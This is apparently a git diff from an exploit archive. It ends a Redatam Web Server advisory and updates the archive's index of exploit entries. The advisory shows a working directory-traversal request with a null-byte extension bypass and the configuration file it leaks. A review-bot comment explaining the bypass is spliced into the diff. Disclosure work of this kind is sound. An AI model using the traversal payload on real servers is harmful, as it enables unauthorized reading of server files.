File not found in folder [C:\wamp\apps\redatam\redbin\] - [blablabla] + +Script directory /wamp/apps/redatam/redbin/ + +# Request 2 + +GET +/redbin/rpwebutilities.exe/text?LFN=../../../../../../../../../../../../../../../../wamp/apps/redatam/redbin/prt/webservermain.inl%00.htm&TYPE=TMP +HTTP/1.1 +Host: 192.168.1.104 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +# Response 2 + +HTTP/1.1 200 OK +Date: Mon, 18 Jun 2018 10:11:44 GMT +Server: Apache/2.4.23 (Win32) PHP/5.6.25 +Title: +../../../../../../../../../../../../../../../../wamp/apps/redatam/redbin/prt/webservermain.inl +Content: +Content-Length: 2319 +Connection: close +Content-Type: text/html; charset=utf-8 + +[STRUCTURE] +USERCONTROL=YES +GROUPALIGN=LEFT + +SERVERTIMEOUT=1800 + +HTMLPATH=RpSite\ + +PORTALTITLE=CELADE/CEPAL, Nações Unidas +PORTALSUBTITLE=Procesamiento En-Línea com REDATAM + +//PORTALCENTERIMAGE=/redatam/images/LogoRedatam7_520x390.png +//PORTALBACKGROUNDHEADERIMAGE= +//PORTALBACKGROUNDINDEXIMAGE= +//PORTALBACKGROUNDOUTPUTIMAGE= \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dbf816cd4..9b8dc6510 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
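Review bot: The title says `< 7` but the header says `# Version: before V6`, so the affected range is inconsistent; pick one and name the release actually tested. The `%00.htm` tail on both requests suggests the handler checks for an `.htm` extension and then truncates at the NUL (the `Title:` header in response 2 echoes the path without `.htm`), so this is traversal combined with null-byte truncation and the description should say so — a fix that only rejects `../` would leave the suffix bypass in place; please confirm the extension check. The first request is not traversal but an error page leaking the install path (`C:\wamp\apps\redatam\redbin\`), and labelling it as information disclosure used to build the second request would make the write-up read correctly. `# Tested on: Pardus Windows AppServ` names two different platforms; the `Server:` header shows `Apache/2.4.23 (Win32)`, so please clarify.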
@@ -9775,6 +9775,7 @@ id,file,description,date,author,type,platform,port
 44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
 44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
 44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux,
+44899,exploits/linux/local/44899.txt,"Nikto 2.1.6 - CSV Injection",2018-06-18,"Adam Greenhill",local,linux,
 41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86,
 44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android,
 44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,
@@ -9782,6 +9783,10 @@ id,file,description,date,author,type,platform,port
 44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux,
 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,
 44896,exploits/windows/local/44896.vb,"Soroush IM Desktop app 0.15 - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,
+44900,exploits/windows/local/44900.txt,"Pale Moon Browser < 27.9.3 - Use After Free (PoC)",2018-06-18,"Berk Cem Göksel",local,windows,
+44903,exploits/windows/local/44903.py,"Audiograbber 1.83 - Local Buffer Overflow (SEH)",2018-06-18,"Dennis 'dhn' Herrmann",local,windows,
+44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux,
+44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39527,8 +39532,6 @@ id,file,description,date,author,type,platform,port
 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
-44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
-44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
 44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
@@ -39550,10 +39553,11 @@ id,file,description,date,author,type,platform,port
 44882,exploits/php/webapps/44882.txt,"Canon PrintMe EFI - Cross-Site Scripting",2018-06-12,"Huy Kha",webapps,php,
 44883,exploits/php/webapps/44883.txt,"WordPress Google Map Plugin < 4.0.4 - SQL Injection",2018-06-12,defensecode,webapps,php,
 44884,exploits/php/webapps/44884.txt,"WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php,
-44885,exploits/hardware/webapps/44885.txt,"Canon LBP7110Cw - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
-44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
 44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
 44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
 44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,
 44895,exploits/php/webapps/44895.txt,"OEcms 3.1 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
 44897,exploits/php/webapps/44897.txt,"Dimofinf CMS 3.0.0 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
+44901,exploits/php/webapps/44901.html,"Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery",2018-06-18,L0RD,webapps,php,
+44902,exploits/linux/webapps/44902.txt,"RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery",2018-06-18,"Dolev Farhi",webapps,linux,
+44905,exploits/windows/webapps/44905.txt,"Redatam Web Server < 7 - Directory Traversal",2018-06-18,"Berk Dusunur",webapps,windows,